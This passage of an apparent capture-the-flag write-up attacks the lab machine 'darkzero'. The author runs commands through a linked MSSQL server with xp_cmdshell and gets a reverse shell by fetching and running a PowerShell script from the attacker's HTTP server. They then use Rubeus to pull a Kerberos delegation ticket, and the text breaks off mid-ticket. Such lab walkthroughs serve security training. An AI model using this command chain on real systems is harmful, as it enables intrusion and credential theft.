deviation: 0s, median: -3s -| smb2-time:   -|   date: 2026-06-23T10:19:20 -|_  start_date: N/A -| smb2-security-mode:   -|   3.1.1:   -|_    Message signing enabled and required - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 155.90 seconds -``` - -So we have `DNS 53/tcp` and `ms-sql-s 1433/tcp`, other than that, classic Active Directory ports open : `kerberos 88/tcp, LDAP 389/tcp msrpc 135/tcp, netBIOS 139/tcp, vmrdp 2179/tcp, smb 445/tcp` and `RPC over HTTP` as well as the DC name `DC01.darkzero.htb`. - -```bash ->  echo "10.129.20.10 DC01.darkzero.htb darkzero.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.20.10 DC01.darkzero.htb darkzero.htb -``` - -We try `nxc` on the `mssql` : - -```bash ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d darkzero.htb - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] darkzero.htb\john.w:RFulUtONCOL! -``` - -And it works. - -We investigate mssql through netexec : - -```bash ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d DC01.darkzero.htb -M mssql_priv - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] DC01.darkzero.htb\john.w:RFulUtONCOL!   ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d DC01.darkzero.htb -M enum_links - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] DC01.darkzero.htb\john.w:RFulUtONCOL!   -ENUM_LINKS  10.129.20.10    1433   DC01             [+] Linked servers found: -ENUM_LINKS  10.129.20.10    1433   DC01             [*]   - DC01 -ENUM_LINKS  10.129.20.10    1433   DC01             [*]   - DC02.darkzero.ext -``` - -We found a linked server : `DC02.darkzero.ext`. - -We continue to investigate : - -```bash ->  echo "10.129.20.10 DC01.darkzero.htb darkzero.htb DC02.darkzero.ext" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.20.10 DC01.darkzero.htb darkzero.htb DC02.darkzero.ext ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d DC01.darkzero.htb -M enum_impersonate - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] DC01.darkzero.htb\john.w:RFulUtONCOL!   -ENUM_IMP... 10.129.20.10    1433   DC01             [-] No users with impersonation rights found. -``` - -So we found a `linked server` on `ms-sql 1433/tcp`. - -We'll check the user list with an `LDAP` search : - -```bash ->  nxc ldap 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d DC01.darkzero.htb --users -LDAP        10.129.20.10    389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DC01.darkzero.htb) (signing:Enforced) (channel binding:When Supported)   -LDAP        10.129.20.10    389    DC01             [+] DC01.darkzero.htb\john.w:RFulUtONCOL!   -LDAP        10.129.20.10    389    DC01             [*] Enumerated 4 domain users: DC01.darkzero.htb -LDAP        10.129.20.10    389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-                                                 -LDAP        10.129.20.10    389    DC01             Administrator                 2025-09-10 18:42:44 0        Built-in account for administering the computer/domain        -LDAP        10.129.20.10    389    DC01             Guest                                      0        Built-in account for guest access to the computer/domain      -LDAP        10.129.20.10    389    DC01             krbtgt                        2025-07-29 13:40:16 0        Key Distribution Center Service Account                       -LDAP        10.129.20.10    389    DC01             john.w                        2025-07-29 17:33:53 0 -``` - -That doesn't give us much for an AD, maybe the `linked server` has more to offer. - -We interact with it via `netexec mssql` : - -```bash ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -q "SELECT name, product, data_source, is_linked, is_remote_login_enabled, is_rpc_out_enabled, is_data_access_enabled FROM sys.servers WHERE -is_linked = 1" - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] darkzero.htb\john.w:RFulUtONCOL!   -MSSQL       10.129.20.10    1433   DC01             name:DC02.darkzero.ext -MSSQL       10.129.20.10    1433   DC01             product:SQL Server -MSSQL       10.129.20.10    1433   DC01             data_source:DC02.darkzero.ext -MSSQL       10.129.20.10    1433   DC01             is_linked:True -MSSQL       10.129.20.10    1433   DC01             is_remote_login_enabled:True -MSSQL       10.129.20.10    1433   DC01             is_rpc_out_enabled:True -MSSQL       10.129.20.10    1433   DC01             is_data_access_enabled:False -``` - -We try to `RCE` using `CMD` : - -```bash ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -M exec_on_link -o LINKED_SERVER=DC02.darkzero.ext COMMAND=whoami - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] darkzero.htb\john.w:RFulUtONCOL!   -EXEC_ON_... 10.129.20.10    1433   DC01             [*] Command output: [] ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -M exec_on_link -o LINKED_SERVER=DC02.darkzero.ext COMMAND=id - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] darkzero.htb\john.w:RFulUtONCOL!   -EXEC_ON_... 10.129.20.10    1433   DC01             [*] Command output: [] -``` - -But the "command output" is empty. - -We enable `xp_cmdshell` : - -```bash ->  nxc mssql 10.129.20.10 -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -M link_enable_cmdshell -o LINKED_SERVER=DC02.darkzero.ext ACTION=enable - -MSSQL       10.129.20.10    1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (EncryptionReq:False) -MSSQL       10.129.20.10    1433   DC01             [+] darkzero.htb\john.w:RFulUtONCOL!   -LINK_ENA... 10.129.20.10    1433   DC01             [*] Enabling xp_cmdshell on DC02.darkzero.ext. Current value: False -LINK_ENA... 10.129.20.10    1433   DC01             [+] xp_cmdshell enabled on DC02.darkzero.ext -``` - -We then use `Impacket` : - -```bash ->  PYTHONNOUSERSITE=1 mssqlclient.py -windows-auth 'darkzero.htb/john.w:RFulUtONCOL!@10.129.20.10' - -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Encryption required, switching to TLS -[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master -[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english -[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 -[*] INFO(DC01): Line 1: Changed database context to 'master'. -[*] INFO(DC01): Line 1: Changed language setting to us_english. -[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000) -[!] Press help for extra shell commands -``` - -```sql -SQL (darkzero\john.w  guest@master)> EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext]; -INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. -INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. -``` - -```SQL -SQL (darkzero\john.w  guest@master)> EXEC ('xp_cmdshell ''whoami''') AT [DC02.darkzero.ext] -output                   ---------------------     -darkzero-ext\svc_sql     -NULL -``` - -We are `svc_sql`. - -```SQL -SQL (darkzero\john.w  guest@master)> EXEC ('xp_cmdshell ''whoami /all''') AT [DC02.darkzero.ext] -output                                                                                                                                                                             -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------     -NULL                                                                                                                                                                               -USER INFORMATION                                                                                                                                                                   -----------------                                                                                                                                                                   -NULL                                                                                                                                                                               -User Name            SID                                                                                                                                                           -==================== ============================================                                                                                                                  -darkzero-ext\svc_sql S-1-5-21-1969715525-31638512-2552845157-1103                                                                                                                  -NULL                                                                                                                                                                               -NULL                                                                                                                                                                               -GROUP INFORMATION                                                                                                                                                                  ------------------                                                                                                                                                                  -NULL                                                                                                                                                                               -Group Name                                 Type             SID                                                             Attributes                                             -========================================== ================ =============================================================== ==================================================     -Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group     -BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group     -BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group     -BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                                    Mandatory group, Enabled by default, Enabled group     -NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group     -CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group     -NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group     -NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group     -NT SERVICE\MSSQLSERVER                     Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner         -LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group     -Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group     -Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                           -NULL                                                                                                                                                                               -NULL                                                                                                                                                                               -PRIVILEGES INFORMATION                                                                                                                                                             -----------------------                                                                                                                                                             -NULL                                                                                                                                                                               -Privilege Name                Description                    State                                                                                                                 -============================= ============================== ========                                                                                                              -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                               -SeCreateGlobalPrivilege       Create global objects          Enabled                                                                                                               -SeIncreaseWorkingSetPrivilege Increase a process working set Disabled                                                                                                              -NULL                                                                                                                                                                               -NULL                                                                                                                                                                               -USER CLAIMS INFORMATION                                                                                                                                                            ------------------------                                                                                                                                                            -NULL                                                                                                                                                                               -User claims unknown.                                                                                                                                                               -NULL                                                                                                                                                                               -Kerberos support for Dynamic Access Control on this device has been disabled.                                                                                                      -NULL -``` - -and `EXEC ('xp_cmdshell ''cmd /c cd & dir''') AT [DC02.darkzero.ext]` puts us in a directory with `2042 File(s)` and `103 Dir(s)`. - -We try to find stuff in that gigantic dir : - -```SQL -SQL (darkzero\john.w  guest@master)> EXEC ('xp_cmdshell ''cmd /c findstr /si /m password *.config *.ini *.xml 2>nul''') AT [DC02.darkzero.ext]; -output                                                                             -------------------------------------------------------------------------------     -DriverStore\FileRepository\prnms012.inf_amd64_885b8c3f72dc8a31\Amd64\MSIPP.xml     -icsxml\ipcfg.xml                                                                   -icsxml\pppcfg.xml                                                                  -schema.ini                                                                         -NULL -SQL (darkzero\john.w  guest@master)> EXEC ('xp_cmdshell ''cmd /c dir C:\Users & dir C:\ /b''') AT [DC02.darkzero.ext]; -output                                                   -----------------------------------------------------     -Volume in drive C has no label.                         -Volume Serial Number is E415-87AD                       -NULL                                                     -Directory of C:\Users                                   -NULL                                                     -07/29/2025  03:23 PM              .                 -06/23/2026  10:19 AM              Administrator     -07/29/2025  12:58 PM              Public            -07/29/2025  03:23 PM              svc_sql           -              0 File(s)              0 bytes            -              4 Dir(s)   3,296,722,944 bytes free       -PerfLogs                                                 -Policy_Backup.inf                                        -Program Files                                            -Program Files (x86)                                      -Users                                                    -Windows                                                  -NULL -``` - -So we only have us, and the `Administrator` it seems, so we haven't found the `AD` user database. - -We read the `Policy_Backup` : - -```bash -SQL (darkzero\john.w  guest@master)> EXEC ('xp_cmdshell ''cmd /c type C:\Policy_Backup.inf''') AT [DC02.darkzero.ext]; -output                                                                                                                                                                                                             -                                                 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------     -[Unicode]                                                                                                                                                                                                          -                                                 -Unicode=yes                                                                                                                                                                                                        -                                                 -[System Access]                                                                                                                                                                                                    -                                                 -MinimumPasswordAge = 1                                                                                                                                                                                             -                                                 -MaximumPasswordAge = 42                                                                                                                                                                                            -                                                 -MinimumPasswordLength = 7                                                                                                                                                                                          -                                                 -PasswordComplexity = 1                                                                                                                                                                                             -                                                 -PasswordHistorySize = 24                                                                                                                                                                                           -                                                 -LockoutBadCount = 0                                                                                                                                                                                                -                                                 -RequireLogonToChangePassword = 0                                                                                                                                                                                   -                                                 -ForceLogoffWhenHourExpire = 0                                                                                                                                                                                      -                                                 -NewAdministratorName = "Administrator"                                                                                                                                                                             -                                                 -NewGuestName = "Guest"                                                                                                                                                                                             -                                                 -ClearTextPassword = 0                                                                                                                                                                                              -                                                 -LSAAnonymousNameLookup = 0                                                                                                                                                                                         -                                                 -EnableAdminAccount = 1                                                                                                                                                                                             -                                                 -EnableGuestAccount = 0                                                                                                                                                                                             -                                                 -[Event Audit]                                                                                                                                                                                                      -                                                 -AuditSystemEvents = 0                                                                                                                                                                                              -                                                 -AuditLogonEvents = 0                                                                                                                                                                                               -                                                 -AuditObjectAccess = 0                                                                                                                                                                                              -                                                 -AuditPrivilegeUse = 0                                                                                                                                                                                              -                                                 -AuditPolicyChange = 0                                                                                                                                                                                              -                                                 -AuditAccountManage = 0                                                                                                                                                                                             -                                                 -AuditProcessTracking = 0                                                                                                                                                                                           -                                                 -AuditDSAccess = 0                                                                                                                                                                                                  -                                                 -AuditAccountLogon = 0                                                                                                                                                                                              -                                                 -[Kerberos Policy]                                                                                                                                                                                                  -                                                 -MaxTicketAge = 10                                                                                                                                                                                                  -                                                 -MaxRenewAge = 7                                                                                                                                                                                                    -                                                 -MaxServiceAge = 600                                                                                                                                                                                                -                                                 -MaxClockSkew = 5                                                                                                                                                                                                   -                                                 -TicketValidateClient = 1                                                                                                                                                                                           -                                                 -[Registry Values]                                                                                                                                                                                                  -                                                 -MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole\SecurityLevel=4,0                                                                                                                       -                                                 -MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole\SetCommand=4,0                                                                                                                          -                                                 -MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount=1,"10"                                                                                                                             -                                                 -MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ForceUnlockLogon=4,0                                                                                                                                 -                                                 -MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning=4,5                                                                                                                            -                                                 -MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ScRemoveOption=1,"0"                                                                                                                                 -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin=4,5                                                                                                                   -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser=4,3                                                                                                                    -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD=4,0                                                                                                                                   -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName=4,0                                                                                                                      -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection=4,1                                                                                                                     -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA=4,1                                                                                                                                    -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths=4,1                                                                                                                         -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle=4,0                                                                                                                       -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization=4,1                                                                                                                         -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption=1,""                                                                                                                          -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText=7,                                                                                                                               -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop=4,1                                                                                                                        -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption=4,0                                                                                                                                -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ShutdownWithoutLogon=4,0                                                                                                                         -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\UndockWithoutLogon=4,1                                                                                                                           -                                                 -MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures=4,0                                                                                                                  -                                                 -MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\AuthenticodeEnabled=4,0                                                                                                                          -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\AuditBaseObjects=4,0                                                                                                                                                  -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\CrashOnAuditFail=4,0                                                                                                                                                  -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\DisableDomainCreds=4,0                                                                                                                                                -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous=4,0                                                                                                                                         -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled=4,0                                                                                                                                       -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0                                                                                                                                                        -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing=3,0                                                                                                                                             -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse=4,1                                                                                                                                             -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\MSV1_0\NTLMMinClientSec=4,536870912                                                                                                                                   -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\MSV1_0\NTLMMinServerSec=4,536870912                                                                                                                                   -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1                                                                                                                                                          -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0                                                                                                                                                 -                                                 -MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=4,1                                                                                                                                              -                                                 -MACHINE\System\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers\AddPrinterDrivers=4,1                                                                                                       -                                                 -MACHINE\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedExactPaths\Machine=7,System\CurrentControlSet\Control\ProductOptions,System\CurrentControlSet\Control\Server Applications,Software\Micros -oft\Windows NT\CurrentVersion                     -MACHINE\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths\Machine=7,System\CurrentControlSet\Control\Print\Printers,System\CurrentControlSet\Services\Eventlog,Software\Microsoft\OLAP Server -,Software\Microsoft\Windows NT\CurrentVersion     -\Print,Software\Microsoft\Windows NT\CurrentVersion\Windows,System\CurrentControlSet\Control\ContentIndex,System\CurrentControlSet\Control\Terminal Server,System\CurrentControlSet\Control\Terminal Server\UserCo -nfig,System\CurrentControlSet\Control\Termina     -l Server\DefaultUserConfiguration,Software\Microsoft\Windows NT\CurrentVersion\Perflib,System\CurrentControlSet\Services\SysmonLog,SYSTEM\CurrentControlSet\Services\CertSvc                                       -                                                 -MACHINE\System\CurrentControlSet\Control\Session Manager\Kernel\ObCaseInsensitive=4,1                                                                                                                              -                                                 -MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown=4,0                                                                                                             -                                                 -MACHINE\System\CurrentControlSet\Control\Session Manager\ProtectionMode=4,1                                                                                                                                        -                                                 -MACHINE\System\CurrentControlSet\Control\Session Manager\SubSystems\optional=7,                                                                                                                                    -                                                 -MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\AutoDisconnect=4,15                                                                                                                              -                                                 -MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableForcedLogOff=4,1                                                                                                                           -                                                 -MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1                                                                                                                      -                                                 -MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\NullSessionPipes=7,,netlogon,samr,lsarpc                                                                                                         -                                                 -MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1                                                                                                                     -                                                 -MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RestrictNullSessAccess=4,1                                                                                                                       -                                                 -MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnablePlainTextPassword=4,0                                                                                                                 -                                                 -MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnableSecuritySignature=4,1                                                                                                                 -                                                 -MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\RequireSecuritySignature=4,0                                                                                                                -                                                 -MACHINE\System\CurrentControlSet\Services\LDAP\LDAPClientIntegrity=4,1                                                                                                                                             -                                                 -MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange=4,0                                                                                                                            -                                                 -MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge=4,30                                                                                                                              -                                                 -MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1                                                                                                                                -                                                 -MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireStrongKey=4,1                                                                                                                                 -                                                 -MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SealSecureChannel=4,1                                                                                                                                -                                                 -MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SignSecureChannel=4,1                                                                                                                                -                                                 -MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1                                                                                                                                  -                                                 -[Privilege Rights]                                                                                                                                                                                                 -                                                 -SeNetworkLogonRight = *S-1-1-0,*S-1-5-11,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-9                                                                                                                                      -                                                 -SeMachineAccountPrivilege = *S-1-5-11                                                                                                                                                                              -                                                 -SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551                                                                                                                                                      -                                                 -SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-11,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968 --1052248003                                       -SeSystemtimePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549                                                                                                                                                      -                                                 -SeCreatePagefilePrivilege = *S-1-5-32-544                                                                                                                                                                          -                                                 -SeDebugPrivilege = *S-1-5-32-544                                                                                                                                                                                   -                                                 -SeRemoteShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549                                                                                                                                                            -                                                 -SeAuditPrivilege = *S-1-5-19,*S-1-5-20                                                                                                                                                                             -                                                 -SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003                      -                                                 -SeIncreaseBasePriorityPrivilege = *S-1-5-32-544,*S-1-5-90-0                                                                                                                                                        -                                                 -SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550                                                                                                                                                                -                                                 -SeBatchLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-559                                                                                                                                                      -                                                 -SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02,*S-1-5-80-0,*S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107 -430,*S-1-5-80-3880718306-3832830129-167785921     -4-2598158968-1052248003                                                                                                                                                                                            -                                                 -SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-548,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551,*S-1-5-9                                                                                                           -                                                 -SeSecurityPrivilege = *S-1-5-32-544                                                                                                                                                                                -                                                 -SeSystemEnvironmentPrivilege = *S-1-5-32-544                                                                                                                                                                       -                                                 -SeProfileSingleProcessPrivilege = *S-1-5-32-544                                                                                                                                                                    -                                                 -SeSystemProfilePrivilege = *S-1-5-32-544,*S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420                                                                                                           -                                                 -SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003                               -                                                 -SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551                                                                                                                                                     -                                                 -SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551                                                                                                                                      -                                                 -SeTakeOwnershipPrivilege = *S-1-5-32-544                                                                                                                                                                           -                                                 -SeUndockPrivilege = *S-1-5-32-544                                                                                                                                                                                  -                                                 -SeEnableDelegationPrivilege = *S-1-5-32-544                                                                                                                                                                        -                                                 -SeManageVolumePrivilege = *S-1-5-32-544                                                                                                                                                                            -                                                 -SeRemoteInteractiveLogonRight = *S-1-5-32-544                                                                                                                                                                      -                                                 -SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6                                                                                                                                                -                                                 -SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6                                                                                                                                               -                                                 -SeIncreaseWorkingSetPrivilege = *S-1-5-32-545                                                                                                                                                                      -                                                 -SeTimeZonePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549                                                                                                                                                        -                                                 -SeCreateSymbolicLinkPrivilege = *S-1-5-32-544                                                                                                                                                                      -                                                 -SeDelegateSessionUserImpersonatePrivilege = *S-1-5-32-544                                                                                                                                                          -                                                 -[Version]                                                                                                                                                                                                          -                                                 -signature="$CHICAGO$"                                                                                                                                                                                              -                                                 -Revision=1                                                                                                                                                                                                         -                                                 -NULL -``` - -We then create a `shell.ps1` file and open python http server and a `nc` listener : - -```bash ->  nano shell.ps1 ->  python3 -m http.server 9000 --bind 10.10.14.129 - -Serving HTTP on 10.10.14.129 port 9000 (http://10.10.14.129:9000/) ... -``` - -```bash ->  nc -lvnp 1337 - -Listening on 0.0.0.0 1337 -``` - -And we get a shell on the listener : - -```SQL -SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell powershell -c "iex(iwr http://10.10.14.129:9000/shell.ps1 -UseBasicParsing)" -``` - -```PowerShell -PS C:\Windows\system32>cd C:\Users\svc_sql\Desktop -PS C:\Users\svc_sql\Desktop> whoami /priv - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                    State     -============================= ============================== ======== -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled   -SeCreateGlobalPrivilege       Create global objects          Enabled   -SeIncreaseWorkingSetPrivilege Increase a process working set Disabled -``` - -We copy our `privesc` windows executables to the directory on which the python server is running : - -```bash -cp ~/Arsenal/windows/dotnet/Rubeus.exe ~/htb/darkzero/ -cp ~/Arsenal/windows/exe/RunasCs.exe ~/htb/darkzero/ -cp ~/Arsenal/windows/potato/GodPotato-NET4.exe ~/htb/darkzero/ -``` - -```PowerShell -PS C:\Users\svc_sql\Desktop> cd C:\Windows\Tasks -PS C:\Windows\Tasks> iwr http://10.10.14.129:9000/Rubeus.exe -OutFile Rubeus.exe -PS C:\Windows\Tasks> .\Rubeus.exe tgtdeleg /nowrap - -  ______        _                        - (_____ \      | |                       -  _____) )_   _| |__  _____ _   _  ___   - |  __  /| | | |  _ \| ___ | | | |/___) - | |  \ \| |_| | |_) ) ____| |_| |___ | - |_|   |_|____/|____/|_____)____/(___/ - - v2.2.0   - - -[*] Action: Request Fake Delegation TGT (current user) - -[*] No target SPN specified, attempting to build 'cifs/dc.domain.com' -[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC02.darkzero.ext' -[+] Kerberos GSS-API initialization success! -[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output. -[*] Found the AP-REQ delegation ticket in the GSS-API output. -[*] Authenticator etype: aes256_cts_hmac_sha1 -[*] Extracted the service ticket session key from the ticket cache: YSVhE5jcoOVDX51t79ZL5FGsaqiAzSSAZYB4/8yZJhs= -[+] Successfully decrypted the authenticator -[*] base64(ticket.kirbi): - -     doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEPjCCBDqgAwIBEqEDAgECooIELASCBCjENr76dsX9dDf9qH5XbABCgHx84VcZZgotE5KMDlwC8ikV+zJw 